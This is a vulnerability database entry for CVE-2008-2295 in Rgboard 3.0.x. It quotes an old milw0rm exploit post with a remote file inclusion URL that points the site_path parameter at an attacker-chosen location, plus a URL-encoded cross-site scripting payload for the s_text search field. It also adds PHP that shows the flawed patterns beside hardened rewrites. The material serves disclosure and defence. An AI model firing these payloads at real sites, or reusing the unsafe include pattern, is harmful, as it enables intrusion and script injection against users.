Rgboard 'bbs.lib.inc.php' Cross-Site Scripting Vulnerability

Vulnerability ID 1115203 Vulnerability type Cross-site scripting
Published 2008-05-14 Updated 2008-09-05
CVE ID CVE-2008-2295 CNNVD ID CNNVD-200805-238
Platform PHP CVSS score 4.3
|Source
https://www.exploit-db.com/exploits/5620
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200805-238
|Details
rg_search.php in Rgboard 3.0.12, and possibly earlier versions, contains a cross-site scripting vulnerability. A remote attacker can inject arbitrary web script or HTML via the s_text parameter and other unspecified vectors.
|Exploit
################################################
#    Rgboard 3.0.x  Multiple Vulnerabilities   #
#                  (RFI/XSS)                   #
################################################

/**/    Author::  e.wiZz!
 
/**/   Site::  www.balcanwarez.com 
 
/**/   Contact:: N/A :D
===========================================================
/**/   Script :: Rgboard
 
/**/   Vulnerable version :: 3.0.0/3.0.12

/**/ Not vulnerable :: 4.0 

/**/   Download :: www.rgboard.com
============================================================
 
[<Remote File Include>]

/**/ Vulnerable code,line 22:
\include\bbs.lib.inc.php

if (!defined('BBS_LIB_INC_INCLUDED')) {
define('BBS_LIB_INC_INCLUDED', 1);
// *start of include,eh?*

if(!$site_path) $site_path='./';
require_once "{$site_path}include/lib.inc.php";
//$site_path

/**/  Exploit:

http://www.target.com/include/bbs.lib.inc.php?site_path=evilthingg0ezhere
             

[<XSS>]

/**/  Almost every field is vulnerable to xss,example(rg_search.php):
 
/**/  Live demo:
   http://xxx.com/rgboard/rg_search.php?bbs_id=search&page_no=2&s_text=%22%3E%3Ca+href%3D%22http%3A%2F%2Fbalcanwarez.com%22%3E%3Ch1%3EOvdje nesto bezze upises,boli me kita :D%3C%2Fh1%3E%3C%2Fa%3E        

 
==============================================================
/**/  Thanx : QKrun1x,F34R,aluigi,Nuclear,aluigi,str0ke
 
/**/ Greetz : to the guys from elitesecurity.org and cyber-underground.org
===============================================================

# milw0rm.com [2008-05-14]
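The two patterns quoted in the advisory, each beside a hardened form. This is an added example for illustration, not Rgboard's code or the vendor's fix; the variable names ($site_path, $s_text) follow the advisory, while the hardened versions and the probe string are assumptions.

```php
<?php
// Added example (not Rgboard's code): the two reported patterns and
// one defensive rewrite of each.

// --- RFI pattern (include/bbs.lib.inc.php, as quoted in the advisory) ---
// With register_globals enabled, a request parameter can populate
// $site_path before the check runs, so the include path is attacker-chosen.
function vulnerable_include_base() {
    global $site_path;
    if (!$site_path) $site_path = './';
    return "{$site_path}include/lib.inc.php";   // may point at a remote URL
}

// Hardened: derive the base directory from this file's own location and
// never from a variable that request data can set. (Disabling
// register_globals and allow_url_include in php.ini is the second layer.)
function hardened_include_base() {
    $site_path = dirname(dirname(__FILE__)) . '/';   // fixed at deploy time
    return $site_path . 'include/lib.inc.php';
}

// --- XSS pattern (rg_search.php, s_text parameter) ---
// Echoing the search term back unescaped inside an attribute lets a
// leading double quote close the attribute and inject markup.
function render_search_box_vulnerable($s_text) {
    return '<input type="text" name="s_text" value="' . $s_text . '">';
}

// Hardened: encode for HTML attribute context, including both quote
// characters, with an explicit charset.
function render_search_box_hardened($s_text) {
    $safe = htmlspecialchars($s_text, ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="s_text" value="' . $safe . '">';
}

// Constructed probe in the shape the advisory's live demo uses.
$probe = '"><h1>injected</h1>';
echo render_search_box_vulnerable($probe), "\n";   // markup breaks out
echo render_search_box_hardened($probe), "\n";     // stays inside value=""
```

Running it shows the hardened renderer emitting `&quot;&gt;&lt;h1&gt;injected&lt;/h1&gt;` inside the attribute, which the browser displays as text rather than parsing as an element.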
|References

Source: XF
Name: rgboard-rgsearch-xss(42432)
Link: http://xforce.iss.net/xforce/xfdb/42432
Source: BID
Name: 29230
Link: http://www.securityfocus.com/bid/29230
Source: MILW0RM
Name: 5620
Link: http://www.milw0rm.com/exploits/5620